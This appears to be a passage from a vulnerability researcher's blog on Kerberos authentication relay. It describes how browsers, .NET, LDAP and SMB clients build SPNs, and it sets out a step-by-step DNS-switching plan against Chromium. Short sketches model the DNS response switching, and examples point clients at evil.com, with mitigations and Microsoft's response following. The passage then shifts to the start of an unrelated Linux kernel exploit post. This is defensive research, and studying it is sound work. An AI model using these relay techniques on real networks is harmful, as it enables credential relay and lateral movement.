You might assume that the SPN always having the HTTP service class would be a problem. However, the Active Directory default SPN mapping will map HTTP to the HOST service class which is always registered. Therefore you can target any domain joined system without needing to register an explicit SPN. As long as the receiving service doesn't then verify the SPN it will work to authenticate to the computer account, which is used by privileged services. You can use the following PowerShell script to list all the configured SPN mappings in a domain.

PS> $base_dn = (Get-ADRootDSE).configurationNamingContext
PS> $dn = "CN=Directory Service,CN=Windows NT,CN=Services,$base_dn"
PS> (Get-ADObject $dn -Properties sPNMappings).sPNMappings
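The effect of the mapping can be illustrated with a short Python sketch. It assumes each sPNMappings value has the form target=alias1,alias2,... and uses a shortened, made-up sample value rather than real output from a domain; the function names are hypothetical.

```python
def parse_spn_mappings(values):
    """Turn sPNMappings strings into an alias -> target dictionary."""
    mapping = {}
    for value in values:
        target, _, aliases = value.partition("=")
        for alias in aliases.split(","):
            alias = alias.strip().lower()
            if alias:
                mapping[alias] = target.strip().lower()
    return mapping


def resolve_service_class(spn: str, mapping: dict) -> str:
    """Replace the service class of an SPN with its mapped target."""
    service, sep, rest = spn.partition("/")
    # Service classes without a mapping are left as they are.
    mapped = mapping.get(service.lower(), service)
    return f"{mapped}{sep}{rest}"


# Illustrative sample only, not the full default list.
SAMPLE = ["host=alerter,cifs,http,www"]
```

With the sample value, resolve_service_class("HTTP/fileserver.domain.com", parse_spn_mappings(SAMPLE)) yields host/fileserver.domain.com, which is why no explicit HTTP SPN needs to be registered on the target.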

One interesting behavior of WinINET is that it always requests Kerberos delegation, although that will only be useful if the SPN's target account is registered for delegation. I couldn't convince WinINET to default to a Kerberos only mode; sending back a WWW-Authenticate: Kerberos header causes the authentication process to stop. This means the Kerberos AP_REQ will always have Integrity enabled even though the user agent doesn't explicitly request it.

Another user of WinINET is Office. For example you can set a template located on an HTTP URL which will generate local Windows authentication if in the Intranet zone just by opening a Word document. This is probably a good vector for getting the authentication started rather than relying on Internet Explorer being available.

WinINET does have some feature controls which can be enabled on a per-executable basis which affect the behavior of the SPN lookup process, specifically FEATURE_USE_CNAME_FOR_SPN_KB911149 and FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771. However these only seem to come into play if the HTTP connection is being proxied, which we're assuming isn't the case.

WinHTTP (WebDAV WebClient)

The WinHTTP library is an alternative to using WinINET in a client application. It's a cleaner API and doesn't have the baggage of being used in Internet Explorer. As an example client I chose to use the built-in WebDAV WebClient service because it gives the interesting property that it converts a UNC file name request into a potentially exploitable HTTP request. If the WebClient service is installed and running then opening a file of the form \\EVIL\abc will cause an HTTP request to be sent out to a server under the attacker's control.

From what I can tell the behavior of WinHTTP when used with the WebClient service is almost exactly the same as for WinINET. I could exploit the SPN generation through local DNS resolution, but not from a public DNS name record. WebDAV seems to consider undotted names to be Intranet zone, however the default for WinHTTP seems to depend on whether the connection would bypass the proxy. The automatic authentication decision is based on the value of the WINHTTP_OPTION_AUTOLOGON_POLICY policy.

At least as used with WebDAV, WinHTTP handles a WWW-Authenticate header of Kerberos; however, it ends up using the Negotiate package regardless, so Integrity will always be enabled. It also enables Kerberos delegation automatically, like WinINET.

Chromium M93

Chromium-based browsers such as Chrome and Edge are open source, so it's a bit easier to check the implementation. By default Chromium will automatically authenticate to intranet zone sites. It uses the same Internet Security Manager used by WinINET to make the zone determination in URLSecurityManagerWin::CanUseDefaultCredentials. An administrator can set GPOs to change this behavior to only allow automatic authentication to a set of hosts.

The SPN is generated in HttpAuthHandlerNegotiate::CreateSPN which is called from HttpAuthHandlerNegotiate::DoResolveCanonicalNameComplete. While the documentation for CreateSPN mentions it's basically a copy of the behavior in IE, it technically isn't. Instead of taking the canonical name from the initial DNS request it does a second DNS request, and the result of that is used to generate the SPN.

This second DNS request is important as it means that we now have a way of exploiting this from a public DNS name. If you set the TTL of the initial host DNS record to a very low value, then it's possible to change the DNS response between the lookup for the host to connect to and the lookup for the canonical name to use for the SPN.

This will also work with local DNS resolution, though in that case the response doesn't need to be switched as one response is sufficient. This second DNS lookup behavior can be disabled with a GPO. If it is disabled then neither local DNS resolution nor public DNS will work, as Chromium will use the host specified in the URL for the SPN.

In a domain environment where the Chromium browser is configured to only authenticate to Intranet sites we can abuse the fact that by default authenticated users can add new DNS records to the Microsoft DNS server through LDAP (see this blog post by Kevin Robertson). Using the domain's DNS server is useful as the DNS record could be looked up using a short Intranet name rather than a public DNS name meaning it's likely to be considered a target for automatic authentication.

One problem with using LDAP to add the DNS record is that the DNS server takes at least 180 seconds to refresh its records. This would make it difficult to switch the response from a normal address record to a CNAME record in a short enough time frame to be useful. Instead we can add an NS record to the DNS server which forwards the lookup to our own DNS server. As long as the TTL for the DNS response is short, the domain's DNS server will rerequest the record and we can return different responses without waiting for the DNS server to update from LDAP. This is very similar to a DNS rebinding attack, except instead of swapping the IP address, we're swapping the canonical name.

Diagram of two DNS request attack against Chromium

Therefore a working exploit as shown in the diagram would be the following:

  1. Register an NS record with the DNS server for evilhost.domain.com using existing authenticated credentials via LDAP. Wait for the DNS server to pick up the record.
  2. Direct the browser to connect to http://evilhost. This allows Chromium to automatically authenticate as it's an undotted Intranet host. The browser will look up evilhost.domain.com by adding its primary DNS suffix.
  3. This request goes to the client's DNS server, which then follows the NS record and performs a recursive query to the attacker's DNS server.
  4. The attacker's DNS server returns a normal address record for their HTTP server with a very short TTL.
  5. The browser makes a request to the HTTP server. At this point the attacker delays the response long enough for the cached DNS request to expire. It can then return a 401 to get the browser to authenticate.
  6. The browser makes a second DNS lookup for the canonical name. As the original request has expired, another will be made for evilhost.domain.com. For this lookup the attacker returns a CNAME record for the fileserver.domain.com target. The client's DNS server will look up the IP address for the CNAME host and return that.
  7. The browser will generate the SPN based on the CNAME record and that'll be used to generate the AP_REQ, sending it to the attacker's HTTP server.
  8. The attacker can relay the AP_REQ to the target server.
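
The response switching in steps 4 and 6 can be sketched in Python as a small decision policy. This is a simulation under stated assumptions, not a DNS server: the class name SwitchingDnsPolicy, the helper spn_from_answer, the 192.0.2.10 address and the one-second TTL are all hypothetical, and a real attacker would track state per client rather than with one global counter.

```python
class SwitchingDnsPolicy:
    """Decides what the attacker's DNS server answers for the spoofed name."""

    def __init__(self, http_server_ip, cname_target, ttl_seconds=1):
        self.http_server_ip = http_server_ip
        self.cname_target = cname_target
        self.ttl_seconds = ttl_seconds
        self.queries_seen = 0

    def answer(self, qname):
        """Return (record_type, value, ttl) for the given query."""
        self.queries_seen += 1
        if self.queries_seen == 1:
            # Step 4: address record so the browser connects to the attacker.
            return ("A", self.http_server_ip, self.ttl_seconds)
        # Step 6: the canonical-name lookup is pointed at the relay target.
        return ("CNAME", self.cname_target, self.ttl_seconds)


def spn_from_answer(qname, answer):
    """SPN a client would build if it trusts the CNAME as the canonical name."""
    record_type, value, _ttl = answer
    host = value if record_type == "CNAME" else qname
    return f"HTTP/{host}"


policy = SwitchingDnsPolicy("192.0.2.10", "fileserver.domain.com")
first = policy.answer("evilhost.domain.com")
second = policy.answer("evilhost.domain.com")
print(first)
print(spn_from_answer("evilhost.domain.com", second))
```

The short TTL matters because it is what forces the second lookup to reach the attacker's server again instead of being answered from a cache.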

It's possible that we can combine the local and public DNS attack mechanisms to only need one DNS request. In this case we could set up an NS record to our own DNS server and get the client to resolve the hostname. The client's DNS server would do a recursive query, and at this point our DNS server shouldn't respond immediately. We could then start a classic DNS spoofing attack to return a DNS response packet directly to the client with the spoofed address record.

In general DNS spoofing is limited by requiring the source IP address, transaction ID and the UDP source port to match before the DNS client will accept the response packet. The source IP address should be spoofable on a local network and the client's IP address can be known ahead of time through an initial HTTP connection, so the only problems are the transaction ID and port.

As most clients have a relatively long timeout of 3-5 seconds, that might be enough time to try the majority of the combinations for the ID and port. Of course there isn't really a penalty for trying multiple times. If this attack was practical then you could do the attack on a local network even if local DNS resolution was disabled and enable the attack for libraries which only do a single lookup such as WinINET and WinHTTP. The response could have a long TTL, so that when the access is successful it doesn't need to be repeated for every request.
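
As a rough way to reason about that search space, the following Python sketch computes how many transaction ID and source port pairs exist and what fraction a single attempt could cover. The port range size and the packet rate are assumptions chosen for illustration, not measurements; if the client's source port were predictable, the port count would drop to 1.

```python
TXID_VALUES = 2 ** 16  # DNS transaction IDs are 16 bits wide


def search_space(port_count):
    """Number of (transaction ID, source port) pairs to cover."""
    return TXID_VALUES * port_count


def fraction_covered(packets_per_second, timeout_seconds, port_count):
    """Fraction of the search space one attempt can cover, capped at 1.0."""
    sent = packets_per_second * timeout_seconds
    return min(1.0, sent / search_space(port_count))


# Assumption: the client picks its source port from a range of 16384 ports.
PORTS = 16384
print(search_space(PORTS))
# Assumption: the attacker can send one million spoofed packets per second.
print(fraction_covered(1_000_000, 5, PORTS))
print(fraction_covered(1_000_000, 5, 1))
```

Because failed attempts carry no real penalty, the per-attempt fraction can be read as a per-attempt success chance that accumulates over repeated tries.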

I couldn't get Chromium to downgrade Negotiate to Kerberos only so Integrity will be enabled. Also since Delegation is not enabled by default, an administrator needs to configure an allow list GPO to specify what targets are allowed to receive delegated credentials.

A bonus quirk for Chromium: It seems to be the only browser which still supports URL based user credentials. If you pass user credentials in the request and get the server to return a request for Negotiate authentication then it'll authenticate automatically regardless of the zone of the site. You can also pass credentials using XMLHttpRequest::open.

While not very practical, this can be used to test a user's password from an arbitrary host. If the username/password is correct and the SPN is spoofed then Chromium will send a validated Kerberos AP_REQ, otherwise either NTLM or no authentication will be sent.

NTLM can always be generated as it doesn't require any proof the password is valid, whereas Kerberos requires the password to be correct to allow the authentication to succeed. You need to specify the domain name when authenticating, so you use a URL of the form http://DOMAIN%5CUSER:PASSWORD@HOST.

One other quirk of this is you can specify a fully qualified domain name (FQDN) and user name and the Windows Kerberos implementation will try and authenticate using that server based on the DNS SRV records. For example http://EVIL.COM%5CUSER:PASSWORD@HOST will try to authenticate to the Kerberos service specified through the _kerberos._tcp.evil.com SRV record. This trick works even on non-domain joined systems to generate Kerberos authentication, however it's not clear if this trick has any practical use.
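
A minimal Python sketch of how such a URL could be assembled is shown here. The function names credential_url and kerberos_srv_name and the host.example target are hypothetical; the only points it illustrates are that the backslash between the domain and the user must be percent-encoded as %5C, and that the SRV name is derived from the domain part.

```python
from urllib.parse import quote


def credential_url(domain, user, password, host):
    """Build an http:// URL that embeds DOMAIN\\USER and a password."""
    # The backslash between domain and user must be percent-encoded as %5C.
    userinfo = quote(f"{domain}\\{user}", safe="") + ":" + quote(password, safe="")
    return f"http://{userinfo}@{host}"


def kerberos_srv_name(realm):
    """DNS SRV name consulted to locate the Kerberos service for a realm."""
    return f"_kerberos._tcp.{realm.lower()}"


print(credential_url("DOMAIN", "USER", "PASSWORD", "host.example"))
print(kerberos_srv_name("EVIL.COM"))
```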

It's worth noting that I did discuss the implications of the Chromium HTTP vector with team members internally, and the general conclusion was that this behavior is by design as it's trying to copy the behavior expected of existing user agents such as IE. Therefore there was no expectation it would be fixed.

Firefox 91

As with Chromium, Firefox is open source so we can find the implementation. Unlike the other HTTP implementations researched up to this point, Firefox doesn't perform Windows authentication by default. An administrator needs to configure either a list of hosts that are allowed to automatically authenticate, or the network.negotiate-auth.allow-non-fqdn setting can be enabled to authenticate to non-dotted host names.

If authentication is enabled it works with both local DNS resolving and public DNS as it does a second DNS lookup when constructing the SPN for Negotiate in nsAuthSSPI::MakeSN. Unlike Chromium there doesn't seem to be a setting to disable this behavior.

Once again I couldn't get Firefox to use raw Kerberos, so Integrity is enabled. Also Delegation is not enabled unless an administrator configures the network.negotiate-auth.delegation-uris setting.

.NET Framework 4.8

The .NET Framework 4.8 officially has two HTTP libraries, the original System.Net.HttpWebRequest and derived APIs and the newer System.Net.Http.HttpClient API. However in the .NET framework the newer API uses the older one under the hood, so we'll only consider the older of the two.

Windows authentication is only generated automatically if the UseDefaultCredentials property is set to true on the HttpWebRequest object as shown below (technically this sets the CredentialCache.DefaultCredentials object, but it's easier to use the boolean property). Once the default credentials are set the client will automatically authenticate using Windows authentication to any host, it doesn't seem to care if that host is in the Intranet zone.

using System.Net;

// Opt in to sending the current user's Windows credentials automatically.
var request = WebRequest.CreateHttp("http://www.evil.com");
request.UseDefaultCredentials = true;
var response = (HttpWebResponse)request.GetResponse();

The SPN is generated in the System.Net.AuthenticationState.GetComputeSpn function which we can find in the .NET reference source. The SPN is built from the canonical name returned by the initial DNS lookup, which means it supports the local but not public DNS resolution. If you follow the code it does support doing a second DNS lookup if the host is undotted, however this is only if the client code sets an explicit Host header as far as I can tell. Note that the code here is slightly different in .NET 2.0 which might support looking up the canonical name as long as the host name is undotted, but I've not verified that.

The .NET Framework supports specifying Kerberos directly as the authentication type in the WWW-Authenticate header. As the client code doesn't explicitly request integrity, this allows the Kerberos AP_REQ to not have Integrity enabled.

The code also supports the WWW-Authenticate header having an initial token, so even if Kerberos wasn't directly supported, you could use Negotiate and specify the stub token I described at the start to force Kerberos authentication. For example returning the following header with the initial 401 status response will force Kerberos through auto-detection:

WWW-Authenticate: Negotiate AAFA
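
For illustration, here is a small Python sketch that decodes that token and builds a raw 401 response carrying it. It only shows the base64 round trip and the header layout; it does not interpret what the three bytes mean to the Negotiate package, and negotiate_challenge is a hypothetical helper name.

```python
import base64


def negotiate_challenge(initial_token: bytes) -> str:
    """Build a raw 401 response carrying a Negotiate header with a token."""
    token = base64.b64encode(initial_token).decode("ascii")
    return (
        "HTTP/1.1 401 Unauthorized\r\n"
        f"WWW-Authenticate: Negotiate {token}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )


stub = base64.b64decode("AAFA")  # decodes to the three bytes 00 01 40
print(stub.hex())
print(negotiate_challenge(stub), end="")
```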

Finally, the authentication code always enables delegation regardless of the target host.

.NET 5.0

The .NET 5.0 runtime has deprecated the HttpWebRequest API in favor of the HttpClient API. It uses a new backend class called the SocketsHttpHandler. As it's all open source we can find the implementation, specifically the AuthenticationHelper class which is a complete rewrite from the .NET Framework version.

To automatically authenticate, the client code must either use the HttpClientHandler class and set the UseDefaultCredentials property as shown below or, if using SocketsHttpHandler, set the Credentials property to the default credentials. This handler must then be specified when creating the HttpClient object.

using System.Net.Http;

// The handler carries the opt-in for automatic Windows authentication.
var handler = new HttpClientHandler();
handler.UseDefaultCredentials = true;
var client = new HttpClient(handler);
await client.GetStringAsync("http://www.evil.com");

Unless the client specified an explicit Host header in the request the authentication will do a DNS lookup for the canonical name. This is separate from the DNS lookup for the HTTP connection so it supports both local and public DNS attacks.

While the implementation doesn't support Kerberos directly like the .NET Framework, it does support passing an initial token so it's still possible to force raw Kerberos which will disable the Integrity requirement.

.NET 6.0

The .NET 6.0 runtime is basically the same as .NET 5.0, except that Integrity is specified explicitly when creating the client authentication context. This means that rolling back to Kerberos no longer has any advantage. This change seems to be down to a broken implementation of NTLM on macOS and not as some anti-NTLM relay measure.

HTTP Overview

The following table summarizes the results of the HTTP protocol research:

  • The LLMNR column indicates it's possible to influence the SPN using a local DNS resolver attack
  • DNS CNAME indicates a public DNS resolving attack
  • Delegation indicates the HTTP user agent enables Kerberos delegation
  • Integrity indicates that integrity protection is requested which reduces the usefulness of the relayed authentication if the target server automatically detects the setting.

User Agent                      LLMNR  DNS CNAME  Delegation  Integrity
Internet Explorer 11 (WinINET)  Yes    No         Yes         Yes
WebDAV (WinHTTP)                Yes    No         Yes         Yes
Chromium (M93)                  Yes    Yes        No†         Yes
Firefox 91                      Yes    Yes        No†         Yes
.NET Framework 4.8              Yes    No‡        Yes         No
.NET 5.0                        Yes    Yes        No          No
.NET 6.0                        Yes    Yes        No          Yes

† Chromium and Firefox can enable delegation only on a per-site basis through a GPO.

‡ .NET Framework supports DNS resolving in special circumstances for non-dotted hostnames.

By far the most permissive client is .NET 5.0. It supports authenticating to any host as long as it has been configured to authenticate automatically. It also supports arbitrary SPN spoofing from a public DNS name as well as disabling integrity through Kerberos fallback. However, as .NET 5.0 is designed to be something usable cross platform, it's possible that few libraries written with it in mind will ever enable automatic authentication.
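
One way to check that reading of the summary table is to encode it as data and filter it, as in the Python sketch below. The values are copied from the table; the function name public_dns_without_integrity is hypothetical, and the filter only captures two of the properties discussed (public DNS spoofing and missing integrity).

```python
# (LLMNR, DNS CNAME, Delegation, Integrity) per user agent, from the table.
RESULTS = {
    "Internet Explorer 11 (WinINET)": (True, False, True, True),
    "WebDAV (WinHTTP)": (True, False, True, True),
    "Chromium (M93)": (True, True, False, True),
    "Firefox 91": (True, True, False, True),
    ".NET Framework 4.8": (True, False, True, False),
    ".NET 5.0": (True, True, False, False),
    ".NET 6.0": (True, True, False, True),
}


def public_dns_without_integrity(results):
    """User agents that allow public DNS SPN spoofing and omit integrity."""
    return [
        name
        for name, (_llmnr, dns_cname, _delegation, integrity) in results.items()
        if dns_cname and not integrity
    ]


print(public_dns_without_integrity(RESULTS))
```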

LDAP

Windows has a built-in general purpose LDAP library in wldap32.dll. This is used by the majority of OS components when accessing Active Directory and is also used by the .NET LdapConnection class. There doesn't seem to be a way of specifying the SPN manually for the LDAP connection using the API. Instead the library builds it from the canonical name returned by the DNS lookup. Therefore it's exploitable in a similar manner to WinINET via local DNS resolution.

The name of the LDAP server can also be found by querying for a SRV record for the hostname. This is used to support accessing the LDAP server from the top-level Windows domain name. The query will usually return an address record alongside the SRV record, so all this does is change the server resolution process, which doesn't seem to give any advantages to exploitation.

Whether the LDAP client enables integrity checking is based on the value of the LDAP_OPT_SIGN flag. As the connection only supports Negotiate authentication, the client passes the ISC_REQ_NO_INTEGRITY flag if signing is disabled so that the server won't auto-detect the signing capability enabled for the Negotiate MIC and accidentally enable signing protection.

As part of recent changes to LDAP signing the client is forced to enable Integrity by the LdapClientIntegrity policy. This means that regardless of whether the LDAP server needs integrity protection it'll be enabled on the client which in turn will automatically enable it on the server. Changing the value of LDAP_OPT_SIGN in the client has no effect once this policy is enabled.

SMB

SMB is one of the most commonly exploited protocols for NTLM relay, as it's easy to convert access to a file into authentication. It would be convenient if it was also exploitable for Kerberos relay. While SMBv1 is deprecated and not even installed on newer installs of Windows, it's still worth looking at the implementation of v1 and v2 to determine if either are exploitable.

The client implementations of SMB 1 and 2 are in mrxsmb10.sys and mrxsmb20.sys respectively with some common code in mrxsmb.sys. Both protocols support specifying a name for the SPN which is related to DFS. The SPN name needs to be specified through the GUID_ECP_DOMAIN_SERVICE_NAME_CONTEXT ECP and is only enabled if the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag in the GUID_ECP_NETWORK_OPEN_CONTEXT ECP (set by MUP) is specified. This is related to UNC hardening which was added to protect things like group policies.

It's easy enough to trigger the conditions to set the NETWORK_OPEN_ECP_OUT_FLAG_RET_MUTUAL_AUTH flag. The default UNC hardening rules always add SYSVOL and NETLOGON UNC paths with a wildcard hostname. Therefore a request to \\evil.com\SYSVOL will cause the flag to be set and the SPN potentially overridable. The server should be a DFS server for this to work, however even with the flag set I've not found a way of setting an arbitrary SPN value remotely.

Even if you could spoof the SPN, the SMB clients always enable Integrity protection. Like LDAP, SMB will enable signing and encryption opportunistically if available from the client, unless UNC hardening measures are in place.

Marshaled Target Information SPN

While investigating the SMB implementation I noticed something interesting. The SMB clients use the function SecMakeSPNEx2 to build the SPN value from the service class and name. You might assume this would just return the SPN as-is, however that's not the case. Instead for the hostname of fileserver with the service class cifs you get back an SPN which looks like the following:

cifs/fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA

Looking at the implementation of SecMakeSPNEx2 it makes a call to the API function CredMarshalTargetInfo. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure and marshals it using a base64 string encoding. This marshaled string is then appended to the end of the real SPN.

The code is therefore just appending some additional target information to the end of the SPN, presumably so it's easier to pass around. My initial assumption would be this information is stripped off before passing to the SSPI APIs by the SMB client. However, passing this SPN value to InitializeSecurityContext as the target name succeeds and gets a Kerberos service ticket for cifs/fileserver. How does that work?

Inside the function SspiExProcessSecurityContext in lsasrv.dll, which is the main entrypoint of InitializeSecurityContext, there's a call to the CredUnmarshalTargetInfo API, which parses the marshaled target information. However SspiExProcessSecurityContext doesn't care about the unmarshalled results, instead it just gets the length of the marshaled data and removes that from the end of the target SPN string. Therefore before the Kerberos package gets the target name it has already been restored to the original SPN.

The encoded SPN shown earlier, minus the service class, is a valid DNS component name and therefore could be used as the hostname in a public or local DNS resolution request. This is interesting as this potentially gives a way of spoofing a hostname which is distinct from the real target service, but when processed by the SSPI API requests the spoofed service ticket. As in if you use the string fileserver1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAfileserversBAAAA as the DNS name, and if the client appends a service class to the name and passes it to SSPI it will get a service ticket for fileserver, however the DNS resolving can trivially return an unrelated IP address.

There are some big limitations to abusing this behavior. The marshaled target information must be valid: the last 6 characters are an encoded length of the entire marshaled buffer, and the buffer is prefixed with a 28 byte header with a magic value of 0x91856535 in the first 4 bytes. If this length is invalid (e.g. larger than the buffer or not a multiple of 2) or the magic isn't present, then the CredUnmarshalTargetInfo call fails and SspiExProcessSecurityContext leaves the SPN as is, which will subsequently fail to query a Kerberos ticket for the SPN.

The easiest way that the name could be invalid is by it being converted to lowercase. DNS is case insensitive, however generally the servers are case preserving. Therefore you could look up the case sensitive name and the DNS server would return that unmodified. However the HTTP clients tested all seem to lowercase the hostname before use, so by the time it's used to build an SPN it's a different string. When unmarshalling, 'a' and 'A' represent different binary values and so parsing of the marshaled information will fail.

Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long, leaving only 19 characters for the SPN part. This is at least larger than the NetBIOS name limit of 15 characters, so as long as there's an SPN registered for that shorter name it should be sufficient. However if there's no short SPN name registered then it's going to be more difficult to exploit.
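
The length and case constraints can be checked with a few lines of Python. This sketch only models the two limits stated in the text (the 63 character label limit and the 44 character minimum buffer); it does not implement the marshaling format, and the function names are hypothetical.

```python
MAX_DNS_LABEL = 63        # longest single DNS name component
MIN_MARSHALED_LEN = 44    # shortest valid marshaled buffer, per the text


def max_spn_host_length():
    """Characters left for the real host name inside one DNS label."""
    return MAX_DNS_LABEL - MIN_MARSHALED_LEN


def usable_as_label(spn_host, marshaled):
    """Check the length and case constraints on host + marshaled suffix."""
    name = spn_host + marshaled
    fits = len(name) <= MAX_DNS_LABEL and len(marshaled) >= MIN_MARSHALED_LEN
    # A client that lowercases the name corrupts the case-sensitive encoding.
    survives_lowercase = marshaled == marshaled.lower()
    return fits, survives_lowercase


print(max_spn_host_length())
# Placeholder suffix of the minimum length; not a valid marshaled buffer.
print(usable_as_label("fileserver", "A" * 44))
```

The second result shows a name that fits in a label but would not survive a client lowercasing it, which is the failure mode seen with the HTTP clients.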

In theory you could specify the SPN using its FQDN. However it's hard to construct such a name. The length value must be at the end of the string and needs to be a valid marshaled value so you can't have any dots within its 6 characters. It's possible to have a TLD which is 6 characters or longer and as the embedded marshaled values are not escaped this can be used to construct a valid FQDN which would then resolve to another SPN target. For example:

fileserver1UWhRCAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAA.domain.oBAAAA

is a valid DNS name which would resolve to an SPN for fileserver. Except that oBAAAA is not a valid public TLD. Pulling the list of valid TLDs from ICANN's website and converting all values which are 6 characters or longer into the expected length value, the smallest length which is a multiple of 2 is from WEBCAM which results in a DNS name at least 264331 characters long, which is somewhat above the 255 character limit usually considered valid for a FQDN in DNS.

Therefore this would still be limited to more local attacks and only for limited sets of protocols. For example an authenticated user could register a DNS entry for the local domain using this value and trick an RPC client to connect to it using its undotted hostname. As long as the client doesn't modify the name other than putting the service class on it (or it gets automatically generated by the RPC runtime) then this spoofs the SPN for the request.

Microsoft's Response to the Research

I didn't initially set out to look at Kerberos authentication relay. As mentioned, I found it inadvertently when looking at IPsec and AuthIP, which I subsequently reported to Microsoft. After doing more research into other network protocols I decided to use the AuthIP issue as a bellwether on Microsoft's views on whether relaying Kerberos authentication and spoofing SPNs would cross a security boundary.

As I mentioned earlier the AuthIP issue was classed as "vNext", which denotes it might be fixed in a future version of Windows, but not as a security update for any currently shipping version of Windows. This was because Microsoft determined it to be a Moderate severity issue (see this for the explanation of the severities). Only Important or above will be serviced.

It seems that the general rule is that any network protocol where the SPN can be spoofed to generate Kerberos authentication which can be relayed, is not sufficient to meet the severity level for a fix. However, any network facing service which can be used to induce authentication where the attacker does not have existing network authentication credentials is considered an Important severity spoofing issue and will be fixed. This is why PetitPotam was fixed as CVE-2021-36942, as it could be exploited from an unauthenticated user.

As my research focused entirely on the network protocols themselves and not the ways of inducing authentication, they will all be covered under the same Moderate severity. This means that if they were to be fixed at all, it'd be in unspecified future versions of Windows.

Available Mitigations

How can you defend yourself against authentication relay attacks presented in this blog post? While I think I've made the case that it's possible to relay Kerberos authentication, it's somewhat more limited in scope than NTLM relay. This means that disabling NTLM is still an invaluable option for mitigating authentication relay issues on a Windows enterprise network.

Also, except for disabling NTLM, all the mitigations for NTLM relay apply to Kerberos relay. Requiring signing or sealing on the protocol if possible is sufficient to prevent the majority of attack vectors, especially on important network services such as LDAP.

For TLS encapsulated protocols, channel binding prevents the authentication being relayed as I didn't find any way of spoofing the TLS certificate at the same time. If the network service supports EPA, such as HTTPS or LDAPS it should be enabled. Even if the protocol doesn't support EPA, enabling TLS protection if possible is still valuable. This not only provides more robust server authentication, which Kerberos mutual authentication doesn't really provide, it'll also hide Kerberos authentication tokens from sniffing or MitM attacks.

Some libraries, such as WinHTTP and .NET set the undocumented ISC_REQ_UNVERIFIED_TARGET_NAME request attribute when calling InitializeSecurityContext in certain circumstances. This affects the behavior of the server when querying for the SPN used during authentication. Some servers such as SMB and IIS with EPA can be configured to validate the SPN. If this request attribute flag is set then while the authentication will succeed when the server goes to check the SPN, it gets an empty string which will not match the server's expectations. If you're a developer you should use this flag if the SPN has been provided from an untrustworthy source, although this will only be beneficial if the server is checking the received SPN.

A common thread through the research is abusing local DNS resolution to spoof the SPN. Disabling LLMNR and MDNS should always be best practice, and this just highlights the dangers of leaving them enabled. While it might be possible to perform the same attacks through DNS spoofing attacks, these are likely to be much less reliable than local DNS spoofing attacks.

If Windows authentication isn't needed from a network client, it'd be wise to disable it if supported. For example, some HTTP user agents support disabling automatic Windows authentication entirely, while others such as Firefox don't enable it by default. Chromium also supports disabling the DNS lookup process for generating the SPN through group policy.

Finally, blocking untrusted devices on the network such as through 802.1X or requiring authenticated IPsec/IKEv2 for all network communications to high value services would go some way to limiting the impact of all authentication relay attacks. Although of course, an attacker could still compromise a trusted host and use that to mount the attack.

Conclusions

I hope that this blog post has demonstrated that Kerberos relay attacks are feasible and just disabling NTLM is not a sufficient mitigation strategy in an enterprise environment. While DNS is a common thread and is the root cause of the majority of these protocol issues, it's still possible to spoof SPNs using other protocols such as AuthIP and MSRPC without needing to play DNS tricks.

While I wrote my own tooling to perform the LLMNR attack there are various public tools which can mount an LLMNR and MDNS spoofing attack such as the venerable Python Responder. It shouldn't be hard to modify one of the tools to verify my findings.

I've also not investigated every possible network protocol which might perform Kerberos authentication. I've also not looked at non-Windows systems which might support Kerberos such as Linux and macOS. It's possible that in more heterogeneous networks the impact might be more pronounced as some of the security changes in Microsoft's Kerberos implementation might not be present.

If you're doing your own research into this area, you should look at how the SPN is specified by the protocol, but also how the implementation builds it. For example the HTTP Negotiate RFC states how to build the SPN for Kerberos, but then each implementation does it slightly differently and not to the RFC specification.

You should be especially wary of any protocol where an untrusted server can specify an arbitrary SPN. This is the case in AuthIP, MSRPC and DCOM. It's almost certain that when these protocols were originally designed many years ago, that no thought was given to the possible abuse of this design for relaying the Kerberos network authentication.

How a simple Linux kernel memory corruption bug can lead to complete system compromise

An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from end of last year: I already wrote most of this blogpost around April, but only recently finished it)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
        spinlock_t ctrl_lock;
[...]
        struct pid *pgrp;               /* Protected by ctrl lock */
        struct pid *session;
[...]
        struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Neither of these fields points directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

